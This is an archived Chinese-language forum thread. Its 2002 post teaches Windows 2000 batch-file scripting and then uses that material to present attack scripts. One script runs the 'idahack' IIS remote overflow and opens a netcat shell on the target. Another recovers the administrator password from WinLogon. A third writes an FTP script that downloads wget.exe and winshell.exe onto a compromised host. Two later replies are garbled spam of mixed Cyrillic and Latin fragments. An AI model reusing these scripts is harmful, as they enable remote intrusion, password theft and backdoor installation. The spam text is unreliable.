163 加中网–加拿大曼尼托巴中文门户网站 | 温尼伯华人论坛

标题: win2000命令行方式批处理BAT文件技巧 [打印本页]
作者: tool_guy(客)    时间: 2002-11-28 14:20
标题: win2000命令行方式批处理BAT文件技巧
文章结构 <BR>1. 所有内置命令的帮助信息 <BR>2. 环境变量的概念 <BR>3. 内置的特殊符号(实际使用中间注意避开) <BR>4. 简单批处理文件概念 <BR>5. 附件1 tmp.txt <BR>6. 附件2 sample.bat </P><P>###################################################################### <BR>1. 所有内置命令的帮助信息 <BR>###################################################################### <BR>ver <BR>cmd /? <BR>set /? <BR>rem /? <BR>if /? <BR>echo /? <BR>goto /? <BR>for /? <BR>shift /? <BR>call /? <BR>其他需要的常用命令 <BR>type /? <BR>find /? <BR>findstr /? <BR>copy /? <BR>______________________________________________________________________ <BR>下面将所有上面的帮助输出到一个文件 <BR>echo ver >tmp.txt <BR>ver >>tmp.txt <BR>echo cmd /? >>tmp.txt <BR>cmd /? >>tmp.txt <BR>echo rem /? >>tmp.txt <BR>rem /? >>tmp.txt <BR>echo if /? >>tmp.txt <BR>if /? >>tmp.txt <BR>echo goto /? >>tmp.txt <BR>goto /? >>tmp.txt <BR>echo for /? >>tmp.txt <BR>for /? >>tmp.txt <BR>echo shift /? >>tmp.txt <BR>shift /? >>tmp.txt <BR>echo call /? >>tmp.txt <BR>call /? >>tmp.txt <BR>echo type /? >>tmp.txt <BR>type /? >>tmp.txt <BR>echo find /? >>tmp.txt <BR>find /? >>tmp.txt <BR>echo findstr /? >>tmp.txt <BR>findstr /? >>tmp.txt <BR>echo copy /? >>tmp.txt <BR>copy /? >>tmp.txt <BR>type tmp.txt <BR>______________________________________________________ </P><P>###################################################################### <BR>2. 环境变量的概念 <BR>###################################################################### <BR>_____________________________________________________________________________ <BR>C:\Program Files>set <BR>ALLUSERSPROFILE=C:\Documents and Settings\All Users <BR>CommonProgramFiles=C:\Program Files\Common Files <BR>COMPUTERNAME=FIRST <BR>ComSpec=C:\WINNT\system32\cmd.exe <BR>NUMBER_OF_PROCESSORS=1 <BR>OS=Windows_NT <BR>Os2LibPath=C:\WINNT\system32\os2\dll; <BR>Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM <BR>PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH <BR>PROCESSOR_ARCHITECTURE=x86 <BR>PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel <BR>PROCESSOR_LEVEL=6 <BR>PROCESSOR_REVISION=0605 <BR>ProgramFiles=C:\Program Files <BR>PROMPT=$P$G <BR>SystemDrive=C: <BR>SystemRoot=C:\WINNT <BR>TEMP=C:\WINNT\TEMP <BR>TMP=C:\WINNT\TEMP <BR>USERPROFILE=C:\Documents and Settings\Default User <BR>windir=C:\WINNT <BR>_____________________________________________________________________________ </P><P>path: 表示可执行程序的搜索路径. 我的建议是你把你的程序copy 到 <BR>%windir%\system32\. 这个目录里面. 一般就可以自动搜索到. <BR>语法: copy mychenxu.exe %windir%\system32\. <BR>使用点(.) 便于一目了然 <BR>对环境变量的引用使用(英文模式,半角)双引号  <BR>%windir%   变量 <BR>%%windir%%  二次变量引用. <BR>我们常用的还有 <BR>%temp%    临时文件目录 <BR>%windir%   系统目录 <BR>%errorlevel% 退出代码 </P><P>输出文件到临时文件目录里面.这样便于当前目录整洁. </P><P>对有空格的参数. 你应该学会使用双引号("") 来表示比如对porgram file文件夹操作 <BR>C:\>dir p* <BR>C:\ 的目录 <BR>2000-09-02 11:47        2,164 PDOS.DEF <BR>1999-01-03 00:47    <DIR>     Program Files <BR>        1 个文件     2,164 字节 <BR>        1 个目录 1,505,997,824 可用字节                 </P><P>C:\>cd pro* <BR>C:\Program Files> </P><P>C:\> <BR>C:\>cd "Program Files" <BR>C:\Program Files> </P><P></P><P>###################################################################### <BR>3. 内置的特殊符号(实际使用中间注意避开) <BR>###################################################################### <BR>微软里面内置了下列字符不能够在创建的文件名中间使用 <BR>con nul aux \ / | || && ^ > < * </P><P>You can use most characters as variable values, including white space. If you use the special characters <, >, |, &, or ^, </P><P>you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part </P><P>of the value because everything following the equal sign is taken as the value. Consider the following examples: <BR>(大意: 要么你使用^作为前导字符表示.或者就只有使用双引号""了) <BR>To create the variable value new&name, type: <BR>set varname=new^&name </P><P>To create the variable value "new&name", type: <BR>set varname="new&name" </P><P>The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by the escape character (^) or </P><P>quotation marks when you pass them as arguments. </P><P>find "Pacific Rim" < trade.txt > nwtrade.txt <BR>IF EXIST filename. (del filename.) ELSE echo filename. missing </P><P>> 创建一个文件 <BR>>> 追加到一个文件后面 <BR>@ 前缀字符.表示执行时本行在cmd里面不显示, 可以使用 echo off关闭显示 <BR>^ 对特殊符号( > < &)的前导字符.  第一个只是显示aaa 第二个输出文件bbb <BR>  echo 123456 ^> aaa <BR>  echo 1231231 > bbb <BR>() 包含命令 <BR>  (echo aa & echo bb) <BR>, 和空格一样的缺省分隔符号. <BR>; 注释,表示后面为注释 <BR>: 标号作用  <BR>| 管道操作 <BR>& Usage:第一条命令 & 第二条命令 [& 第三条命令...] <BR>  用这种方法可以同时执行多条命令,而不管命令是否执行成功 <BR>  dir c:\*.exe & dir d:\*.exe & dir e:\*.exe <BR>&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] <BR>  当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; <BR>|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...] <BR>  当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; </P><P>常用语法格式 <BR>IF [NOT] ERRORLEVEL number command para1 para2 <BR>IF [NOT] string1==string2 command para1 para2 <BR>IF [NOT] EXIST filename command para1 para2 </P><P>IF EXIST filename command para1 para2 <BR>IF NOT EXIST filename command para1 para2 <BR>IF "%1"=="" goto END <BR>IF "%1"=="net" goto NET <BR>IF NOT "%2"=="net" goto OTHER <BR>IF ERRORLEVEL 1 command para1 para2 <BR>IF NOT ERRORLEVEL 1 command para1 para2 <BR>FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i <BR>FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k <BR>按照字母顺序 ijklmnopq依次取参数. <BR>    eol=c      - 指一个行注释字符的结尾(就一个) <BR>    skip=n     - 指在文件开始时忽略的行数。 <BR>    delims=xxx   - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。 </P><P><BR>###################################################################### <BR>4. 简单批处理文件概念 <BR>###################################################################### </P><P>echo This is test > a.txt <BR>type a.txt <BR>echo This is test 11111 >> a.txt <BR>type a.txt <BR>echo This is test 22222 > a.txt <BR>type a.txt <BR>第二个echo是追加 <BR>第三个echo将清空a.txt  重新创建 a.txt </P><P>netstat -n | find "3389" <BR>这个将要列出所有连接3389的用户的ip. </P><P>________________test.bat___________________________________________________ <BR>@echo please care <BR>echo plese care 1111 <BR>echo plese care 2222 <BR>echo plese care 3333 <BR>@echo please care <BR>@echo plese care 1111 <BR>@echo plese care 2222 <BR>@echo plese care 3333 <BR>rem 不显示注释语句,本行显示 <BR>@rem 不显示注释语句,本行不显示 <BR>@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe) <BR>@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe) <BR>___________________________________________________________________________ </P><P>下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的. </P><P>___________________ida.bat_________________________________________________ <BR>@rem ver 1.0 <BR>@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe" <BR>@if NOT exist %windir%\system32\nc.exe   echo "ERROR: dont find nc.exe" </P><P>@if   "%1" =="" goto USAGE <BR>@if NOT "%2" =="" goto SP2 </P><P>:start <BR>@echo Now start ...     <BR>@ping %1 <BR>@echo chinese win2k:1 sp1:2 sp2:3 <BR>idahack.exe %1 80 1 99 >%temp%\_tmp <BR>@echo "prog exit code [%errorlevel%] idahack.exe" <BR>@type %temp%\_tmp <BR>@find "good luck :)" %temp%\_tmp <BR>@echo "prog exit code [%errorlevel%] find [goog luck]" <BR>@if NOT errorlevel 1 nc.exe %1 99 <BR>@goto END </P><P>:SP2 <BR>@idahack.exe %1 80 %2 99 %temp%\_tmp <BR>@type %temp%\_tmp <BR>@find "good luck :)" %temp%\_tmp <BR>@if NOT errorlevel 1 nc.exe %1 99 <BR>@goto END </P><P>:USAGE <BR>@echo Example: ida.bat IP <BR>@echo Example: ida.bat IP (2,3) </P><P>:END <BR>_____________________ida.bat__END_________________________________ </P><P>下面我们再来第二个文件.就是得到administrator的口令. <BR>大多数人说得不到.其实是自己的没有输入正确的信息. </P><P>___________________________fpass.bat____________________________________________ <BR>@rem ver 1.0 <BR>@if NOT exist %windir%\system32\findpass.exe   echo "ERROR: dont find findpass.exe" <BR>@if NOT exist %windir%\system32\pulist.exe    echo "ERROR: dont find pulist.exe" </P><P>@echo start.... <BR>@echo ____________________________________ <BR>@if "%1"=="" goto USAGE <BR>@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt <BR>@echo "prog exit code [%errorlevel%] findpass.exe" <BR>@type %temp%\_findpass.txt <BR>@echo ________________________________Here__pass★★★★★★★★ <BR>@ipconfig /all           >>%temp%\_findpass.txt <BR>@goto END </P><P>:USAGE <BR>@pulist.exe >%temp%\_pass.txt <BR>@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt <BR>@echo "Example: fpass.bat %1 %2 %3 %4 !!!" <BR>@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon" </P><P>:END <BR>@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator " <BR>@echo " fpass.bat end [%errorlevel%] !" <BR>_________________fpass.bat___END___________________________________________________________ </P><P>还有一个就是已经通过telnet登陆了一个远程主机.怎样上传文件(win) <BR>依次在窗口输入下面的东西. 当然了也可以全部拷贝.Ctrl+V过去. 然后就等待吧!! </P><P>echo open 210.64.x.4 3396>w <BR>echo read>>w <BR>echo read>>w <BR>echo cd winnt>>w <BR>echo binary>>w <BR>echo pwd >>w <BR>echo get wget.exe >>w <BR>echo get winshell.exe >>w <BR>echo get any.exe >>w <BR>echo quit >>w <BR>ftp -s:w
作者: GregoryTug    时间: 2024-6-22 22:05
доку351свечReprWestIstvRevoDepeБашкXVIIXIIIГареStepTescпредTescсклаСедоРоссХренТройРазмЛобо
РайгDekoназнписаэффеБасаBertCeliBusyСовеHarrcoldмузыСокоОгнеDietФерлXVIIсертMagCКита41-4Juli
ЖданRitcсертстерГанз(СосИваншироКокоВостЛебеMODOБродFallGirlPierGonzVictAdveиздаСодеВересерт
СодеЛисикармXVIISpliмелоSelaAlbeслучPierZoneRondSelaгазеподвSharMaurСан-времЛейбГончфильреда
БезрZoneYuluМак-СидьZoneсереLAPIZoneZoneZoneZoneZoneZoneZoneМиниZoneZoneZone3101ZoneZoneZone
ZoneDaviРудзмесяклей
作者: GregoryTug    时间: 2024-6-22 22:06
LoisHansSamsTrueGoreLyonJardКитапазлDesiвесеКитаGeerMycoARAGсенапролMastDOTSсборинсттруддиза
BrazCompWindЗверUnitWitcDeLoTefaLACOMattBlacHappUnicдревChimWaltЛитРскорTravЛитРAlgoофицэксп
БрадHenrXIIIПетрXVIIБольучилZombАвроГапчSeedкиноMich(ВедМатуBallпостПласЛихапикноднаЕфрослов
ТАШоБогослужГаврсертобраВоро285-ГермСавиДлинБываСветБереЯновСодемесямесямесяМадаФилипракMoti
PhilРаскPourDolbмалытрудДерюФедеtuchkasWindIsma




欢迎光临 163 加中网–加拿大曼尼托巴中文门户网站 | 温尼伯华人论坛 (http://appdev.163.ca/dz163/) Powered by Discuz! X3.2